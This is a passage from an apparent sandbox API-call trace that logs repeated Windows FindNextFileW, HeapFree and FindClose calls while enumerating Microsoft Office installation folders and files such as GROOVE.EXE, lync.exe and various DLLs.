ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0185.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.837] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0185.837] FindClose (in: hFindFile=0x43a2918 | out: hFindFile=0x43a2918) returned 1 [0185.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.838] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c5a96a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9d4a250, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x163c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="UmOutlookAddin.dll", cAlternateFileName="UMOUTL~1.DLL")) returned 1 [0185.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.838] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1b680, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AdeModule.dll", cAlternateFileName="ADEMOD~1.DLL")) returned 1 [0185.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.841] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 1 [0185.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.843] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 0 [0185.843] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0185.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.843] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17774bfd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BORDERS", cAlternateFileName="")) returned 1 [0185.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.845] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cf4318, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf7e60, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BSTORM.DLL", cAlternateFileName="")) returned 1 [0185.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.847] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c80c48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c80c48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca4703d4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ee58, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="CONTAB32.DLL", cAlternateFileName="")) returned 1 [0185.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.849] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b60d2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6b60d2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6b60d2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90e8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DELIMWIN.FAE", cAlternateFileName="")) returned 1 [0185.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.850] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bd0a0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="cpprest140_2_6.dll", cAlternateFileName="CPPRES~1.DLL")) returned 1 [0185.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.851] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0185.851] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0185.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.852] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d9058b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0185.852] FindClose (in: hFindFile=0x43a2b98 | out: hFindFile=0x43a2b98) returned 1 [0185.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.853] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4d40834, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17dec0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="DRILLDWN.DLL", cAlternateFileName="")) returned 1 [0185.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.861] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb548de7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0185.861] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0185.861] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.861] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4dd9107, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15f450, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GANTT.DLL", cAlternateFileName="")) returned 1 [0185.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.862] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ManagedObjects", cAlternateFileName="MANAGE~1")) returned 1 [0185.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.862] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 1 [0185.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.862] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 0 [0185.863] FindClose (in: hFindFile=0x43a2898 | out: hFindFile=0x43a2898) returned 1 [0185.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.863] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 1 [0185.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.864] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Components", cAlternateFileName="COMPON~1")) returned 0 [0185.864] FindClose (in: hFindFile=0x43a2898 | out: hFindFile=0x43a2898) returned 1 [0185.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.865] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 0 [0185.865] FindClose (in: hFindFile=0x43a2c18 | out: hFindFile=0x43a2c18) returned 1 [0185.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.865] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Sounds", cAlternateFileName="")) returned 1 [0185.867] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.867] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Places", cAlternateFileName="")) returned 1 [0185.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.925] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 1 [0185.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.927] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 0 [0185.927] FindClose (in: hFindFile=0x43a2cd8 | out: hFindFile=0x43a2cd8) returned 1 [0185.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.927] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolBMPs", cAlternateFileName="")) returned 1 [0185.929] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.929] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolData", cAlternateFileName="")) returned 1 [0185.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.932] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 1 [0185.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.932] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 0 [0185.932] FindClose (in: hFindFile=0x43a2898 | out: hFindFile=0x43a2898) returned 1 [0185.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.932] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="groove.net", cAlternateFileName="")) returned 0 [0185.932] FindClose (in: hFindFile=0x43a2cd8 | out: hFindFile=0x43a2cd8) returned 1 [0185.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.933] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 1 [0185.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.936] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 0 [0185.936] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0185.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.937] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd36584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdf403dbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf58154c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf370c0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GROOVE.EXE", cAlternateFileName="")) returned 1 [0185.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.939] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EUROTOOL.XLAM", cAlternateFileName="EUROTO~1.XLA")) returned 1 [0185.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0185.939] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SOLVER", cAlternateFileName="")) returned 0 [0185.939] FindClose (in: hFindFile=0x43a2c18 | out: hFindFile=0x43a2c18) returned 1 [0185.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.939] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b27715c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="LogoImages", cAlternateFileName="LOGOIM~1")) returned 1 [0185.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.949] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdd0d91a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde4d0d64, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1979a48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="lync.exe", cAlternateFileName="")) returned 1 [0185.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.954] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: 